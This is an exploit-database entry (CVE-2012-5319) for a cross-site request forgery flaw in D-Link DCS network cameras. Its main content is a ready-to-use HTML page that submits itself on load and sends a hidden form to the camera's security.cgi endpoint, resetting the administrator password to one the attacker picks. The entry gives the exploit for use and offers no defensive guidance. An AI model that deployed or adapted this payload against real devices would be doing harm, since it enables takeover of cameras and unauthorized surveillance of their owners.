Dlink DCS series CSRF Change Admin Password



EDB-ID: 18509 CVE: 2012-5319 OSVDB-ID: 79770
Author: rigan Published: 2012-02-22 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Title:   Dlink DCS series CSRF Change Admin Password 
Version: DCS-900, DCS-2000, DCS-5300 and possibly other.
Date:    2012-02-22
Author:  rigan - imrigan [sobachka] gmail.com
--
Description:
Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password. 
--
Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://your_target/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>
--